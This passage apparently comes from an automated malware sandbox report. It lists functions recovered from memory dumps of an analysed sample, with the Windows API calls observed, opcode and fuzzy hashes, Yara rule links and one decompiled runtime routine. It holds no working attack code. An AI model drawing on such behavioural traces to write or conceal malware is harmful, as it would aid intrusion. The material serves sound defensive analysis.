                                                                                                                                    • Opcode Fuzzy Hash: bfdc93135bb8e1f01ad17a6c2756a181809ba613a77c2e68333703720b866323
                                                                                                                                    • Instruction Fuzzy Hash: 13E0C2F81042845FEB14FF69D8C089B7BD5FF81314B108A5AE86947306C631E92ADFB1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F67068, Relevance: 3.1, APIs: 2, Instructions: 61threadwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F670CA
                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F670EB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                    • Opcode ID: f4ede25262fb6e4c74ed90ecf52ea5b7d0d63d63119ee510f6408dc7bedd1d7d
                                                                                                                                    • Instruction ID: 8eeee1e4dffeb03b56f6be829850dde83556a9086eb3b618e1e5e9de0e97f0a5
                                                                                                                                    • Opcode Fuzzy Hash: f4ede25262fb6e4c74ed90ecf52ea5b7d0d63d63119ee510f6408dc7bedd1d7d
                                                                                                                                    • Instruction Fuzzy Hash: 2801D631A802297BE720A6909C46FBEB768DB41B94F144159FB04BB1C0E7E469068BF5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F67070, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F670CA
                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F670EB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                    • Opcode ID: b76798f295e3ba56c5ad7c5e957e505c5b2927d16b0fee6c0dde983882dd6863
                                                                                                                                    • Instruction ID: b9e1d666d0011ff2f7788041ab581896fd8e6d9ee537a0db88d139302f657125
                                                                                                                                    • Opcode Fuzzy Hash: b76798f295e3ba56c5ad7c5e957e505c5b2927d16b0fee6c0dde983882dd6863
                                                                                                                                    • Instruction Fuzzy Hash: BB01A231A8022977EB20AA948C42FBE776CDB40F94F154159FF04BA1C1E7E469068BF6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F69AF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F69B62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 2c78643bad6e30f4ea8c0f4a77ac75325507bca23f3a68eb4ab84608b245d78b
                                                                                                                                    • Instruction ID: c5a5af57152b8931596b2d4f8a752dda54fb0ed8fc4d3f292b06f37cb4ffbbe1
                                                                                                                                    • Opcode Fuzzy Hash: 2c78643bad6e30f4ea8c0f4a77ac75325507bca23f3a68eb4ab84608b245d78b
                                                                                                                                    • Instruction Fuzzy Hash: CA011EB5E4020EABDF10EAA4DC45FAEB379DB54348F004195EA0897240F671E714CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F78500, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F78554
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                    • Instruction ID: 55f7f6662c74ef0e0b1d946681e91fbe59e858f31ccad4f6356dfafea30e8f91
                                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                    • Instruction Fuzzy Hash: 7C01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F76FD0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F6CCA0,?,?), ref: 02F7700C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                    • Opcode ID: 1ec0bcf43cfeada3cf0df82c07475058d1b9cdf7a96d147d1bccb919d94a702f
                                                                                                                                    • Instruction ID: da1b3e420a0e92321f4f905669a81d82c43ac9938b6e24479e12b1230024c8b0
                                                                                                                                    • Opcode Fuzzy Hash: 1ec0bcf43cfeada3cf0df82c07475058d1b9cdf7a96d147d1bccb919d94a702f
                                                                                                                                    • Instruction Fuzzy Hash: 11E092333903043AE330759DAC02FA7B39CCB85B60F54006AFB0DEB2C1D695F80146A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F76FC3, Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F6CCA0,?,?), ref: 02F7700C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                    • Opcode ID: 65b621de215188c33927a493d145fb8cfe677ab589ab04ed13cbd17ab489679c
                                                                                                                                    • Instruction ID: 4019952ac90a3e1a35c532e46664e9d6e2b7ed1946cb24b5dfea56df287d03c8
                                                                                                                                    • Opcode Fuzzy Hash: 65b621de215188c33927a493d145fb8cfe677ab589ab04ed13cbd17ab489679c
                                                                                                                                    • Instruction Fuzzy Hash: 1CF0223238170036E3302AA89C02F9B7768DB80B60F14011AFB09AB2C0CBA5F80087A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F785E1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6CF72,02F6CF72,?,00000000,?,?), ref: 02F78620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    • Opcode ID: 22e0ebccd62e5a35db41cc78615f4f25418b32a9c1deb629b6d4dd6969cff0ad
                                                                                                                                    • Instruction ID: a7af1381eba8e5d15666d86e8f6ccb235c09421d93e7bf6e865c9a482bd9a843
                                                                                                                                    • Opcode Fuzzy Hash: 22e0ebccd62e5a35db41cc78615f4f25418b32a9c1deb629b6d4dd6969cff0ad
                                                                                                                                    • Instruction Fuzzy Hash: 6DF0A0B6200204AFC710DF54CC82EE77BE9AF49350F148559FA199B641C530A811CFF1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F785F0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6CF72,02F6CF72,?,00000000,?,?), ref: 02F78620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                    • Instruction ID: 44afab40d71bf02dd78c2344058d878540c54fe8c41e376c90da07cd208ac025
                                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                    • Instruction Fuzzy Hash: A2E01AB12002086BDB10EF49CC84EE737ADAF88650F018155FA0957241C930E8108BF5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F6D3DC, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02F67A73,?), ref: 02F6D40B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: 7fa66a859d6a8b7845eecebba08ae12e1d0fa7866d835c6da9c2de13d527e179
                                                                                                                                    • Instruction ID: 72951638731c98096af3d6f2ddb00bbf14500c5cf3453ea8de6685547ee8d4e8
                                                                                                                                    • Opcode Fuzzy Hash: 7fa66a859d6a8b7845eecebba08ae12e1d0fa7866d835c6da9c2de13d527e179
                                                                                                                                    • Instruction Fuzzy Hash: 03D02B90BAC3C429F711A7B42D03F172A844711780F0905A9B54CEF5C3D608C00A0236
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F6D3E0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02F67A73,?), ref: 02F6D40B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                    • Instruction ID: c45751dbc379b5b1f9aacfc1dbea9189c6c49e3e2ab7a5c0d4187c61ae72204a
                                                                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                    • Instruction Fuzzy Hash: 35D0A7717503083BEA10FBA49C07F2632CC9B44B44F494064FA49D73C3DA50F4014561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0374967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: f55f1255bc22c68fc14e50c59f97e512230ea0e327e95603285ef877deb20f6c
                                                                                                                                    • Instruction ID: 90ee0430ec3fc5fc4d16b6ee64f2c1c1a3df07d7cecb89f887eb8bef7a92ea7a
                                                                                                                                    • Opcode Fuzzy Hash: f55f1255bc22c68fc14e50c59f97e512230ea0e327e95603285ef877deb20f6c
                                                                                                                                    • Instruction Fuzzy Hash: 2CB09B719424C5CAE615D76046087177944B7D5741F16C065E2020641A4778D0D1F5B6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 0379FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			E0379FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0374CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03795720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03795720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                    0x0379fdda
                                                                                                                                    0x0379fde2
                                                                                                                                    0x0379fde5
                                                                                                                                    0x0379fdec
                                                                                                                                    0x0379fdfa
                                                                                                                                    0x0379fdff
                                                                                                                                    0x0379fe0a
                                                                                                                                    0x0379fe0f
                                                                                                                                    0x0379fe17
                                                                                                                                    0x0379fe1e
                                                                                                                                    0x0379fe19
                                                                                                                                    0x0379fe19
                                                                                                                                    0x0379fe19
                                                                                                                                    0x0379fe20
                                                                                                                                    0x0379fe21
                                                                                                                                    0x0379fe22
                                                                                                                                    0x0379fe25
                                                                                                                                    0x0379fe40

                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0379FDFA
                                                                                                                                    Strings
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0379FE2B
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0379FE01
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                    • API String ID: 885266447-3903918235
                                                                                                                                    • Opcode ID: 991a2908f17a47cc70ccd3cf852aac41627c96044ad10ad11e5dfbf8d89cdaa3
                                                                                                                                    • Instruction ID: a5ee6147f933a532ddf49f40b1b18abffda2007d8dfcdd34110b8e23f17327f6
                                                                                                                                    • Opcode Fuzzy Hash: 991a2908f17a47cc70ccd3cf852aac41627c96044ad10ad11e5dfbf8d89cdaa3
                                                                                                                                    • Instruction Fuzzy Hash: C2F0F676240611BFEA219A45EC06F23BB6AEB45730F140319F6289A1D1DA62F92097F0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%